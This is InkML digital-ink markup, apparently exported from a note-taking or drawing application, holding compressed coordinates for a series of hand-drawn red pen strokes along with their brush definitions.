  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'0'4'0,"1"0"0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,0-1 0,4 6 0,4 9 0,22 67 0,-23-56 0,14 31 0,-12-35 0,13 53 0,-20-61 0,0 0 0,2 0 0,0 0 0,1-1 0,0 0 0,2 0 0,11 17 0,-15-26 0,0 1 0,-1-1 0,0 1 0,-1 0 0,1 0 0,1 10 0,-2-11 0,-1 1 0,1 0 0,1-1 0,-1 0 0,1 0 0,0 0 0,9 11 0,-6-11 0,13 17 0,2-2 0,31 26 0,-49-45 0,0 0 0,0-1 0,1 1 0,-1-1 0,1 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0-1 0,8-3 0,7-5 0,-1 0 0,0-1 0,-1-1 0,18-16 0,10-6 0,-39 30 0,-1 0 0,0-1 0,-1 0 0,1 0 0,-1-1 0,0 1 0,-1-1 0,1 0 0,-1-1 0,0 1 0,-1 0 0,5-12 0,-4 7 0,-1-1 0,0 0 0,0 0 0,-2 0 0,1 0 0,-2-22 0,0 3 0,-1 0 0,-2 0 0,-8-39 0,5 37 0,4 22 0,-1 0 0,1 0 0,-2 0 0,-4-11 0,6 18 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,-8-3 0,1 0 0,5 3 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0 0 0,-8-2 0,15 4 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1-1 0,15 13 0,-12-11 0,26 13 0,2-2 0,59 18 0,-57-20-1365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15.747"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">318 167 24575,'17'45'0,"-10"39"0,-6-61 0,1 1 0,6 27 0,-2-13 0,-2 1 0,-2 0 0,-4 74 0,0-26 0,2 304 0,-1-363 0,-9 46 0,5-44 0,-1 38 0,3-12-108,-2 0-1,-3 0 1,-3-1 0,-1 0-1,-21 54 1,0 17 108,22-81 0,-25 71 0,26-90 162,0 1 1,1 1 0,-6 37-1,10-43-162,0 0 0,-16 37 0,14-40 0,0-1 0,1 1 0,1 1 0,-2 21 0,-4 23 0,7-44 0,0 0 0,0 25 0,4 412 0,0-446 0,-2 0 0,0 1 0,0-1 0,-1 0 0,0 0 0,-1 0 0,0 0 0,-1-1 0,0 0 0,-7 10 0,4-4 0,7-15 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,0 3 0,-1-3 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,0 0 0,10 0 0,0-1 0,0 0 0,0 0 0,15-4 0,-6 1 0,66-3-291,116 7-1,-80 2 134,65-15 158,-77 3 0,-13 1-614,65-3-698,-3 1 1384,13 0-1039,-152 11 899,247-12-42,-92 3 110,-1 1 0,-16-5-231,188 11 0,-171 4 140,891-2 2212,-1042 1-1344,48 9 0,-47-6-468,45 3 0,363-8-309,-416 2 0,1 1 0,25 6 0,28 2 0,-26-4-94,0 1 0,84 25 0,-90-21 25,1 0 0,-1-3 1,1-2-1,54 3 0,-46-9 138,73-3 384,-119 2-447,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1-1 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,0-1 0,4-6 0,2-3-8,-2-1 0,1 0 0,7-25-1,-9 12 3,-1 1 0,-1-1 0,-1 0 0,-1-1 0,-5-42 0,2-7 0,2 43 0,2 1 0,9-52 0,11-89 0,-1-17 0,1 13 0,0 5 0,-17 130 0,-2-1 0,-1 1 0,-5-47 0,1 35 0,5-60 0,8 56 0,-7 44 0,-1-1 0,2-25 0,-4-503 0,-3 265 0,2-179 0,0 450-227,-1 0-1,1 0 1,-2 1-1,1-1 1,-4-9-1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1.575"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">18 448 24575,'-1'0'0,"0"1"0,0-1 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0 34 0,3-25 0,0-1 0,1 1 0,0-1 0,1 0 0,0-1 0,1 1 0,0-1 0,0 0 0,11 11 0,21 34 0,-33-45 0,1-1 0,0 1 0,1-1 0,0 0 0,1-1 0,-1 0 0,11 7 0,65 40 0,-45-31 0,-8-6 0,1-2 0,0-1 0,55 17 0,-86-31 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,-32 26 0,22-18 0,7-4 0,0-1 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,0-1 0,0 1 0,-6 0 0,8-2 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,-4-5 0,1 1 0,-9-8 0,2-1 0,0 0 0,-17-29 0,27 41 0,0-1 0,0 1 0,1-1 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 1 0,0-1 0,3-5 0,0 3 0,1 1 0,0 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0 1 0,0 0 0,12-2 0,-6 1 0,-1-1 0,0 0 0,14-7 0,72-51 0,-90 57 0,-1 0 0,0 0 0,0 0 0,7-8 0,15-12 0,-18 16 0,0 0 0,-1-1 0,0 0 0,0 0 0,-2-1 0,13-18 0,37-78 0,-55 102 0,4-11 0,-1 0 0,6-24 0,9-22 0,-18 52 0,0-1 0,0 0 0,-1 0 0,0 0 0,-1 0 0,0-20 0,5-35 0,-5 60 0,0 1 0,1 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,6-7 0,-8 10 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,1 1 0,-1 0 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,1 0 0,1 0 0,-2 0 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0 1 0,3 9 0,0 0 0,-1 1 0,4 22 0,-5-21 0,14 52 0,24 64 0,-11-41 0,-13-23 0,-13-47 0,1-1 0,1 0 0,1 0 0,8 17 0,55 114 0,-63-132 0,0 2 0,0-1 0,4 33 0,-6-26 0,12 35 0,3-2 0,30 74 0,-46-124 0,0 0 0,-1 1 0,0-1 0,0 1 0,0 11 0,-8-47 15,-1 0 0,-2 0 0,0 1 0,-2 1 0,-15-27 0,-19-48-1470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2"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'500'0'-1365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01.443"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 34 24575,'102'1'0,"110"-3"0,-212 2-6,70-8 133,-65 8-262,1-1 0,-1-1 0,0 1-1,1-1 1,-1 0 0,0 0 0,0-1 0,0 1 0,-1-1 0,6-4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01.817"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'16'0'0,"0"2"0,30 6 0,-29-4 0,0-1 0,22 2 0,73 5 0,-70-4 0,45-1 0,478-5 0,-613-1 0,-90 4 0,116-1 0,1 1 0,-1 0 0,1 2 0,-28 10 0,33-10-1365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02.249"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 35 24575,'7'0'0,"0"-1"0,0 0 0,0-1 0,13-4 0,19-3 0,50 3 0,92 7 0,-58 2 0,-103-3-107,-16 1 23,1 0 0,0-1 0,0 0 0,0 0 0,-1 0 0,1-1 1,0 1-1,0-1 0,-1-1 0,1 1 0,0 0 0,-1-1 1,1 0-1,4-3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02.596"/>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0.466"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">629 0 24575,'18'46'0,"9"26"0,-19-54 0,0 1 0,-2-1 0,0 1 0,-1 0 0,-1 1 0,3 32 0,-6-14 0,-2-1 0,-2 0 0,-1 0 0,-1 0 0,-16 52 0,6-29 0,12-45 0,0 0 0,-1-1 0,-1 1 0,-8 19 0,10-29 0,0 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,0-1 0,1 0 0,-1-1 0,0 1 0,0-1 0,-7 2 0,-8 1 0,-1-2 0,1 0 0,-1-1 0,0-1 0,0-1 0,-31-3 0,-13 0 0,-16 4 0,-76-3 0,153 2-45,0-1-1,0 1 1,0-1-1,0 0 1,0-1-1,0 1 1,1-1-1,-1 0 1,0 1-1,1-2 1,0 1-1,-1 0 1,1-1-1,0 1 1,0-1-1,0 0 1,1 0-1,-1 0 1,1 0-1,-1-1 1,1 1-1,0-1 1,1 1-1,-1-1 0,0 0 1,1 1-1,0-1 1,0 0-1,-1-8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0.955"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">88 0 24575,'0'435'0,"-2"-413"0,0 0 0,-2 0 0,0-1 0,-2 0 0,-9 25 0,7-25 0,2 1 0,0 0 0,1 0 0,-3 39 0,5-44 0,-3-30 0,-4-30 0,7-74-513,3 100-339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1.409"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'1'3'0,"0"0"0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,2 4 0,5 10 0,5 12 0,1 1 0,1-2 0,25 33 0,26 45 0,-27-45 0,-28-45 0,-1 0 0,11 24 0,-20-37 0,22 42 0,-23-43 0,1 0 0,-1-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,4-1 0,-4 0 0,0-1 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 0 0,2-3 0,11-39 0,-9 31 0,-1 0 0,2 0 0,0 0 0,0 1 0,10-17 0,13-33 0,-25 57 0,-1-1 0,1 1 0,1-1 0,6-9 0,10-15 0,-11 13 32,1 1 0,0 0-1,15-16 1,-13 16-529,0 1-1,15-29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1.813"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'1'0'0,"0"1"0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 2 0,13 23 0,-11-19 0,52 116 0,-39-92 0,-12-25 0,-1 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,0-1 0,1 9 0,20 106 0,-40-177-1365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5:57.530"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">414 0 24575,'-1'113'0,"3"123"0,8-164 0,-5-45 0,2 47 0,-6 129 835,-2 272-7811,0-282 7259,1 0 5575,-1-177-5858,-1 1 0,-6 28 0,4-28 0,1 1 0,-1 20 0,3-6 0,1-6 0,-1-1 0,-1 0 0,-7 28 0,4-23 0,-3 32 0,-1 11 0,-5 12 0,-19 90 0,23-140 0,6-19 0,0-1 0,1 0 0,0 1 0,0 18 0,0 1 0,-1 0 0,-11 43 0,8-45 0,1 0 0,-2 57 0,8-64 0,-1 0 0,0 0 0,-2 0 0,-1 0 0,-1-1 0,-10 29 0,11-41 0,1 1 0,1 0 0,0 0 0,0 0 0,2 21 0,0-18 0,-1-1 0,0 0 0,-6 26 0,-7 12 0,-9 73 0,13-73 0,7-36 0,-1 0 0,0 23 0,3-25 0,-1 0 0,-5 20 0,-3 27 0,7-38 0,-1-1 0,-11 40 0,8-42 0,2 1 0,1-1 0,-3 37 0,10 95 0,-5 82 0,2-234 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 1 0,2-2 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,-2 0 0,0 0 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1-1 0,-2-3 0,-3-4 11,2-1-1,0 0 1,0 0-1,1-1 1,0 1-1,-2-22 1,3-1-276,2-35 0,1 34-644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2.772"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 45 24575,'0'-2'0,"0"1"0,1-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,1-1 0,6-2 0,0 1 0,0 0 0,16 0 0,134 1 0,-76 2 0,-75 0 0,0-1 0,0 1 0,0 1 0,0-1 0,0 2 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 1 0,0 0 0,0 0 0,-1 1 0,7 5 0,2 4 0,0 0 0,-2 1 0,1 1 0,14 23 0,-20-26 0,0 0 0,-1 1 0,-1-1 0,0 2 0,-1-1 0,-1 1 0,0-1 0,-1 1 0,2 20 0,-1 15 0,-5 75 0,-2-39 0,3-77 0,0 0 0,-1 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,-6 12 0,6-16 0,0-1 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 0 0,-1 0 0,1 0 0,-6 3 0,-17 14 0,24-17 0,0 0 0,-1 0 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,-4 2 0,-14 3-114,16-5 10,0 1 0,-1-1 0,0 0-1,1 0 1,-1-1 0,0 0-1,0 0 1,0-1 0,0 0 0,0 0-1,-13-2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3.309"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 96 24575,'9'-1'0,"0"0"0,0-1 0,0 0 0,12-4 0,8-2 0,81-17 0,-63 17 0,-24 3 0,1 1 0,34-1 0,-44 5-195,0-2 0,0 0 0,0 0 0,-1-2 0,1 1 0,25-12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3.877"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'1'3'0,"0"1"0,0 0 0,1 0 0,-1-1 0,1 1 0,0-1 0,0 1 0,4 4 0,5 10 0,9 29 0,-2 2 0,16 69 0,-24-72 0,-7-30 0,1 0 0,0 0 0,12 27 0,-8-22-341,-1 1 0,-1-1-1,6 34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24.249"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 4 24575,'349'0'0,"-311"-4"-1365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15.611"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 97 24575,'109'1'0,"-1"-6"0,157-26 0,-236 27 0,1 2 0,0 0 0,30 3 0,48-2 0,-106 1-31,-1 0-1,1 0 0,0-1 0,-1 1 0,1 0 1,0-1-1,-1 1 0,1-1 0,0 0 1,-1 1-1,1-1 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,0 0 1,0 0-1,1-1 0,-1 1 0,0 0 1,0-1-1,0 1 0,0-1 0,-1 1 1,1-1-1,0 1 0,-1-1 0,1 0 1,-1 1-1,1-1 0,-1 0 0,0 1 1,1-1-1,-1 0 0,0 0 0,0 1 1,-1-1-1,1 0 0,0 0 0,0 1 1,-2-4-1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15.988"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'0'4'0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6.509"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'2'31'0,"1"0"0,14 60 0,-9-61 0,-3 1 0,5 62 0,-12 731 0,2-814 0,1 1 0,0-1 0,0 0 0,1 0 0,6 18 0,-8-25 0,1 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,3 1 0,21 0 0,-1 0 0,1-2 0,35-3 0,41 0 0,-91 4 0,0 0 0,1 1 0,-1 0 0,0 1 0,0 0 0,14 7 0,9 5 0,1-2 0,0 0 0,0-3 0,42 7 0,-34-9 0,-30-4 0,1-2 0,-1 1 0,23-1 0,-32-2 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,0-1 0,-1 1 0,0-1 0,1 0 0,3-4 0,88-92 0,-82 88-1365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7.091"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2 1 24575,'-2'113'0,"5"123"0,7-164 0,-5-45 0,2 47 0,-5-43 0,1 0 0,2 0 0,10 33 0,2 17 0,-14-64 0,1 0 0,1-1 0,0 0 0,1 0 0,14 28 0,-20-43 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,5-10 0,-4-22 0,-11-21 0,-2-98 0,11 138 32,-2 1 0,1 0 0,-6-17 0,-1-15-1525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7.482"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 201 24575,'0'-8'0,"1"0"0,0 0 0,0 0 0,0 1 0,1-1 0,0 1 0,1-1 0,0 1 0,0 0 0,0 0 0,1 0 0,0 0 0,1 1 0,-1 0 0,1-1 0,0 2 0,1-1 0,-1 1 0,1-1 0,0 2 0,1-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 1 0,0 0 0,9-1 0,10-4 0,0 2 0,0 1 0,44-3 0,-63 8 0,0 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1 0 0,0 0 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,6 8 0,177 180 0,-174-179 0,-7-5 0,-1-1 0,1 1 0,-1 0 0,-1 1 0,1 0 0,-2-1 0,1 2 0,5 14 0,1 11 0,6 38 0,-9-42 0,-3 2 0,-2-1 0,0 1 0,-2 0 0,-4 36 0,1 6 0,2-69 0,-1 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,0 0 0,-8 9 0,-2 4 0,-3 7 0,14-20 0,0-1 0,1 0 0,-2 1 0,1-1 0,0-1 0,-1 1 0,-5 5 0,7-8 0,-1 0 0,1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,-3-1 0,3 1 4,-1 0 0,1-1-1,0 1 1,-1-1 0,1 1 0,0-1-1,0 0 1,0 0 0,0 0-1,1 0 1,-1 0 0,0-1 0,1 1-1,-1 0 1,1-1 0,0 1 0,0-1-1,0 0 1,0 1 0,1-1-1,-1 0 1,0-3 0,-1-8-179,1 1 0,1-1 0,1-17 1,0 15-578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7.877"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">522 1 24575,'0'18'0,"-1"0"0,-1 0 0,0 0 0,-1 0 0,-1-1 0,-10 28 0,10-35 0,-5 17 0,-2 0 0,-1 0 0,-18 32 0,18-39 0,1 2 0,-14 41 0,18-44 0,0 1 0,-2-1 0,0 0 0,-15 21 0,-12 10 0,1 2 0,-51 105 0,82-145 0,0 1 0,1 0 0,1 0 0,0 0 0,0 0 0,2 1 0,0 18 0,-1 18 0,1-48 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,-2 3 0,2-4 0,0 1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-2-1 0,0 1 0,1-1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,1 1 0,0 0 0,-1-1 0,-1-5 0,-16-53 0,2-1 0,-15-116 0,27 113-1365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5:59.465"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
